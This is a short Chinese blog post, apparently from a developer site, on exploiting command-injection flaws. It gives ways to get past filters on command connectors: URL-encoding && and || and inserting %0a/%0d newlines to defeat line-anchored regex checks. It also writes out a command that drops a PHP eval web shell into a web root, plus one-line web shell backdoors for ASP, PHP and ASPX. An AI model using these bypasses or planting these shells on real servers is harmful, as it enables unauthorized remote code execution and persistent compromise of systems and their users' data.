命令执行漏洞利用及连接符的简单绕过

windows系统执行多条命令执行语法

Linux系统执行多命令执行语法

其中 单个的&后台运行

连接符的过滤绕过

1、URL编码绕过

  • && 可以替换为 %26%26

  • || 可以替换为 %7C%7C

2、特殊编码换行绕过(php代码)

  • 将&&或者||替换为%0a或者%0d(注意:有时候需要%0a前面没有空格才可以成功)

  • 在正则表达式中因为以'^'开头,以'$'结尾的只能匹配一行,也就是说我们可以用%0a,即url编码下的换行\n去绕过正则匹配

命令行中写shell

echo ^<?php @eval($_POST[x])?^>  > D:\wwwroot\x.php

不带空格的一句话木马:

ASP:<%execute(request("cmd"))%>
PHP:<?=@eval($_POST["cmd"]);?>
ASPX:<%@Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Thunderclap_

点赞、关注加收藏~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值